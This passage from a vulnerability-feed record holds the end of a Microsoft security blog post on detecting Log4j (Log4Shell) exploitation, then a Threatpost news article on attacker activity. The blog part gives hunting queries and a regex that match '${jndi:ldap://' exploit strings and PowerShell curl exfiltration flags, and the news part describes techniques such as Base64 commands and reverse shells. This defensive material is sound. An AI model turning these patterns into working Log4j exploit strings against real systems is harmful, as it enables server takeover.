        'Possible source of Log4j exploitation',
        'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
        'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
        )
    // Join in evidence information
    | join AlertEvidence on AlertId
    | where DeviceId != ""
    | summarize by DeviceId, Title;
    // Get additional alert activity for each device
    AlertEvidence
    | where DeviceId in(DevicesLog4JAlerts)
    // Add additional info
    | join kind=leftouter AlertInfo on AlertId
    | summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)

**Suspected exploitation of Log4j vulnerability**

This query looks for exploitation of the vulnerability using known parameters in the malicious string.
It surfaces exploitation but may surface legitimate behavior in some environments.

    DeviceProcessEvents
    | where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')
    // Removing FPs
    | where not(ProcessCommandLine has_any('stackstorm', 'homebrew'))

**Regex to identify malicious exploit string**

This query looks for the malicious string needed to exploit this vulnerability.

    DeviceProcessEvents
    | where ProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'
        or InitiatingProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'

**Suspicious process event creation from VMware Horizon TomcatService**

This query identifies anomalous child processes from the _ws_TomcatService.exe_ process associated with the exploitation of the Log4j vulnerability in VMware Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.

    DeviceProcessEvents
    | where InitiatingProcessFileName has "ws_TomcatService.exe"
    | where FileName != "repadmin.exe"

**Suspicious JScript staging comment**

This query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications.
These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.

    DeviceProcessEvents
    | where FileName has "powershell.exe"
    | where ProcessCommandLine has "VMBlastSG"

**Suspicious PowerShell curl flags**

This query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the “Body” argument are Base64-encoded results from an attacker-issued command. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.

    DeviceProcessEvents
    | where FileName has "powershell.exe"
    | where ProcessCommandLine has_all("-met", "POST", "-Body")

### Microsoft Defender for Cloud

Microsoft Defender for Cloud’s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:

On Windows:

 * Detected obfuscated command line
 * Suspicious use of PowerShell detected

On Linux:

 * Suspicious file download
 * Possible Cryptocoinminer download detected
 * Process associated with digital currency mining detected
 * Potential crypto coin miner started
 * A history file has been cleared
 * Suspicious Shell Script Detected
 * Suspicious domain name reference
 * Digital currency mining related behavior detected
 * Behavior similar to common Linux bots detected

### Microsoft Defender for IoT

Microsoft Defender for IoT has released a dedicated threat intelligence update package for detecting Log4j 2 exploit attempts on the network (example below).

_Figure 19. Microsoft Defender for IoT alert_

The package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>) (click _Updates_, then _Download file_; MD5: 4fbc673742b9ca51a9721c682f404c41).

_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_

Microsoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release; [click here](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>) for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.

Working with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).

### Microsoft Sentinel

A new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.

_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_

To deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**.
Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).\n\n\n\n_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_\n\nNote: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.\n\n#### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection queries to look for this activity:\n\n * [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)\n\nThis hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.\n\n * [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)\n\nThis query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. 
It returns a table of suspicious command lines.\n\n * [Azure WAF Log4j CVE-2021-44228 hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)\n\nThis hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.\n\n * [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)\n\nThis hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.\n\n * [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)\n\nThis hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.\n\n * [Azure WAF matching for ](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[ Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)\n\nThis query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. 
If possible, it then decodes the malicious command for further analysis.\n\n * [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)\n\nThis hunting query helps detect suspicious Base64-encoded, obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used in attacks exploiting the Log4j vulnerability in order to evade detection and stay persistent in the network.\n\n * _[Linux security-related process termination activity detected ](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)_\n\nThis query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise, as seen recently in attacks exploiting the CVE-2021-44228 vulnerability.\n\n * [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)\n\nThis query uses syslog data to alert on any suspicious manipulation of the firewall to evade defenses. 
Attackers often perform such operations, as seen recently in attacks exploiting the CVE-2021-44228 vulnerability, for C2 communications or exfiltration.\n\n * [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)\n\nThis query uses various log sources that carry user agent data to look for CVE-2021-44228 exploitation attempts based on user agent patterns.\n\n * [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)\n\nThis hunting query looks for connections to the LDAP port to find possible exploitation attempts for CVE-2021-44228.\n\n * [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)\n\nThis query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability.\n\n * [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)\n\nThis query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.\n\n * [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)\n\nThis query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe. 
This could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.\n\n### Azure Firewall Premium \n\nCustomers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\n**Recommendation:** Customers are recommended to configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against **CVE-2021-44228** exploit. \n\n\n\n_Figure 23. Azure Firewall Premium portal_\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>). 
Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).\n\n### Azure Web Application Firewall (WAF)\n\nIn response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1 available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) version 3.0/3.1 available for Azure Application Gateway V2 regional deployments.\n\nTo help detect and mitigate the Log4Shell vulnerability by inspecting requests\u2019 headers, URI, and body, we have released the following:\n\n * For Azure Front Door deployments, we have updated the rule **944240 \u201cRemote Command Execution\u201d** under Managed Rules\n * For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules\n\nThese rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules would have already received enhanced protection for Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.\n\n**Recommendation**: Customers are recommended to enable WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1 on Application Gateway V2 to immediately enable protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.\n\n\n\n_Figure 24. 
Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1 _\n\n\n\n_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_\n\nNote: The above protection is also available on Default Rule Set (DRS) 2.0 preview version and OWASP ModSecurity Core Rule Set (CRS) 3.2 preview version, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.\n\nMore information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).\n\n## Indicators of compromise (IOCs)\n\nMicrosoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: [](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)[https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample Data/Feeds/Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>)\n\nMicrosoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.\n\n#### Revision history\n\n**_[01/19/2022] _**_New information about an unrelated vulnerability we discovered while investigating Log4j attacks_\n\n_**[01/11/2022]** New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries _\n\n_**[01/10/2022] **Added 
new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware_\n\n**_[01/07/2022] _**_Added a new rule group in _Azure Web Application Firewall (WAF)_ _\n\n**_[12/27/2021] _**_New capabilities in __threat and vulnerability management__ including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution._\n\n_**[12/22/2021]** Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365._\n\n_**[12/21/2021]**_ _Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal._\n\n**_[12/17/2021] _**_New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries._\n\n_**[12/16/2021] **New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections._\n\n_**[12/15/2021] **Details _about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management._ _\n\n_**[12/14/2021] **New insights about multiple threat actors taking advantage of this vulnerability, _including nation-state actors and access brokers linked to ransomware._ _\n\nThe post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T05:29:03", "type": "mssecure", "title": "Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-35247", "CVE-2021-44228", "CVE-2021-4428", "CVE-2021-44428", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-12T05:29:03", "id": "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "href": "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-01-05T19:45:42", "description": "No surprise here: The holidays bought no Log4Shell relief.\n\nThreat actors vigorously launched exploit attempts and testing during the last weeks of December, Microsoft said on Monday, in the latest update to its [landing page](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) and guidance around the flaws in Apache\u2019s Log4j logging library.\n\n\u201cWe 
have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,\u201d according to Microsoft.\n\nThis comes on the heels of news that relentless Log4Shell attacks have come from nation-state actors that are both testing and have already implemented the exploit: As of Dec. 15, more than 1.8 million attacks, against [half of all corporate networks](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>), using at least 70 distinct malware families, had already been launched to exploit the bugs.\n\n## **What is Log4Shell?**\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 \u2013 [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>) \u2013 are collectively referred to as Log4Shell. Within hours of the initial flaw\u2019s [public disclosure](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) on Dec. 10, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing quickly evolving attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT), reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\nThe new attack vector presented by Log4Shell is vast, severe and has ample potential for widespread exploitation. 
The flaw, which is uber-easy to exploit, is resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated RCE and complete server takeover.\n\nWithin three days of the flaw\u2019s disclosure, it was [spitting out mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>). Within 10 days, the notorious Conti ransomware gang had created a [holistic Log4Shell attack chain](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>). As of last week, Dec. 30, the advanced persistent threat (APT) Aquatic Panda was targeting universities with Log4Shell exploit tools in an [attempt to steal industrial intelligence](<https://threatpost.com/aquatic-panda-log4shell-exploit-tools/177312/>) and military secrets.\n\n## Obfuscated HTTP Requests\n\nMost recently, Microsoft has observed attackers obfuscating the HTTP requests made against targeted systems. Those requests generate a log using Log4j 2 that leverages Java Naming and Directory Interface (JNDI) to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload.\n\nMicrosoft has observed many attacks in which the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems. The crafted string that enables Log4Shell exploitation contains \u201cjndi,\u201d followed by the protocol \u2013 such as \u201cldap,\u201d \u201cldaps,\u201d \u201crmi,\u201d \u201cdns,\u201d \u201ciiop,\u201d or \u201chttp\u201d \u2013 and then the attacker domain.\n\nBut to evade detection, attackers are mixing up the request patterns: For example, Microsoft has seen exploit code written that runs a lower or upper command within the exploitation string. 
Even more complicated obfuscation attempts are being made to try to bypass string-matching detections, such as that shown in the string sample below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/01/04163333/string-e1641332031855.jpg>)\n\n## Minecraft Servers Still Being Exploited\n\nExploitation continues on non-Microsoft-hosted Minecraft servers, the company said: as in, the same type of servers where Log4j was first discovered.\n\nMicrosoft confirmed public reports of Khonsari ransomware being delivered as payload post-exploitation, as [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>) has detailed. Microsoft Defender antivirus data has shown a small number of cases being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader, the company said.\n\n\u201cIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients,\u201d Microsoft said. 
\u201cWe observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\u201d\n\nWhile Minecraft isn\u2019t commonly installed in enterprise networks, Microsoft has nonetheless also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, enabling an actor to fully take over a compromised system, which they then use to run Mimikatz to steal credentials.\n\n\u201cThese techniques are typically associated with enterprise compromises with the intent of lateral movement,\u201d Microsoft said, meaning that the goal in targeting Minecraft users, who tend to be children, seems unclear. It\u2019s early yet in this campaign: There hasn\u2019t yet been detectable follow-on activity, \u201cindicating that the attacker may be gathering access for later use.\u201d\n\nMicrosoft urged Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n## Nation-State Activity\n\nMicrosoft\u2019s Threat Intelligence Center (MSTIC) has also observed the CVE-2021-44228 flaw being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea and Turkey.\n\nThe actors are experimenting during development, integrating the vulnerabilities to in-the-wild payload deployment, and sending exploitations against targets.\n\nOne example: MSTIC has observed the ransomware-wielding, Iranian [Phosphorus](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) actor \u2013 aka Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef or Newscaster, et al. 
\u2013 acquiring and making modifications of the Log4j exploit.\n\n\u201cWe assess that Phosphorus has operationalized these modifications,\u201d Microsoft observed.\n\nMSTIC has also seen the China-linked [Hafnium](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) group using the vulnerability to attack virtualization infrastructure in order to extend the group\u2019s typical targeting. \u201cIn these attacks, Hafnium-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems,\u201d researchers noted.\n\nMicrosoft\u2019s \u201cI\u2019m-a-broken-record\u201d advice: Update affected products and services, and apply security patches ASAP.\n\n\u201cWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible,\u201d Microsoft said.\n\n## RAT Infestation\n\nMicrosoft is also seeing additional remote-access toolkits and reverse shells being dropped via exploitation of CVE-2021-44228, which is malware that actors use for hands-on-keyboard attacks. Besides the Cobalt Strike beacons and PowerShell reverse shells seen in earlier reports, the company has also seen Meterpreter, Bladabindi and HabitsRAT.\n\n\u201cFollow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally,\u201d Microsoft noted.\n\nThe activity is coming from small-scale, possibly more targeted attacks (possibly related to testing campaigns), the software giant said. Also, researchers have observed the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. 
Microsoft said that the HabitsRAT campaign overlapped with infrastructure used in prior campaigns.\n\n## Other Log4Shell Developments\n\nMicrosoft has also seen:\n\n**Multiple ransomware access brokers** using the vulnerability to gain initial access to target networks \u2013 access that they sell to ransomware-as-a-service (RaaS) affiliates. \u201cWe have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms,\u201d Microsoft said.\n\n**Mass scanning by both attackers and security researchers.** The vulnerability has rapidly gotten sucked up into existing [botnets like Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>), existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. \u201cMany of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JNDI:ldap:// request to launch bash commands on Linux and PowerShell on Windows,\u201d the company said.\n\n**No big spikes in ransomware attacks.** True, ransomware has been delivered via modified Minecraft clients, but so far it\u2019s been only a small number of cases. That could change, given that access brokers associated with RaaS affiliates are folding the vulnerability into their initial-access toolkits. But Microsoft is also seeing older ransomware payloads in limited use by security researchers and a small number of attackers. \u201cIn some instances, they appear to be experimenting with deployments via scanning and modified Minecraft servers,\u201d Microsoft said. 
\u201cAs part of these experiments, some ransomware payloads seem to have been deployed to systems that were previously compromised and were originally dropping coin-miner payloads.\u201d\n\n**Webtoos Malware.** Webtoos, a malware with distributed denial-of-service (DDoS) capabilities and persistence mechanisms that could allow an attacker to wreak yet more havoc, is also being deployed via the Log4Shell vulnerability. \u201cAttackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability,\u201d Microsoft said.\n\nMicrosoft\u2019s post has extensive advice on attack vectors and observed activity, finding and remediating vulnerable apps and systems, detecting and responding to exploitation attempts and other related attacker activity, and indicators of compromise (IoCs).\n\n## This Is Just the Start\n\nAs if all that weren\u2019t enough, it\u2019s all likely going to get worse, Microsoft said. 
Just like Log4j is tucked away into nooks and crannies, so too are exploits going to get added to yet more attacker toolkits: \u201cThe majority of attacks we have observed so far have been mainly mass scanning, coin-mining, establishing remote shells and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits,\u201d Microsoft said.\n\n## How Do You Even Know Where Log4J Is Lurking?\n\nA massive part of the Log4Shell nightmare is the fact that it\u2019s not always obvious which software is using a vulnerable version of the Log4j library.\n\nWhile Microsoft has laid out several methods for detecting active exploit attempts using Log4j, identifying the vulnerable version before an attack would be \u201cideal,\u201d according to Ray Kelly, a fellow at NTT Application Security.\n\n\u201cThis will be a continuing battle for both consumers and vendors going forward into 2022 in what will need to be a two-pronged approach,\u201d Kelly told Threatpost. \u201cSecurity vendors have been quick on the response for consumers by adding log4j rules that enable DAST [[dynamic application security scanning](<https://www.rapid7.com/fundamentals/dast/>)] scanners to detect if a website can be exploited with a malicious log4j web request against a company\u2019s web server. At the same time, vendors must ensure that they are not shipping software with the vulnerable version using tools such as SCA [[service component architecture](<https://www.ibm.com/docs/en/cics-ts/6.1_beta?topic=applications-service-component-architecture-sca>)].\u201d\n\n## Asking What to Do? 
It\u2019s a Little Late for That\n\nJake Williams, co-founder and CTO at BreachQuest, echoed Microsoft\u2019s assertion that this vulnerability will have an extremely long tail for exploitation, considering that many organizations don\u2019t even realize they\u2019re running vulnerable software.\n\n\u201cUnfortunately (and nobody wants to hear this), there\u2019s nothing left to say about remediating log4j that hasn\u2019t already been said hundreds of times,\u201d Williams told Threatpost. \u201cAny organization asking today what they need to do regarding log4j almost certainly has an incident on their hands. Every organization with a security team knows what needs to be done to hunt down log4j, they just need the resources and political backing to actually get it done. Being exploited through an internet-facing system running vulnerable log4j at this point is a leadership failure, not a technical one.\u201d\n\n_**Password** **Reset: ****[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. 
**[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T22:49:54", "type": "threatpost", "title": "Microsoft Sees Rampant Log4j Exploit Attempts, Testing", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44428", "CVE-2021-44832", "CVE-2021-45046"], 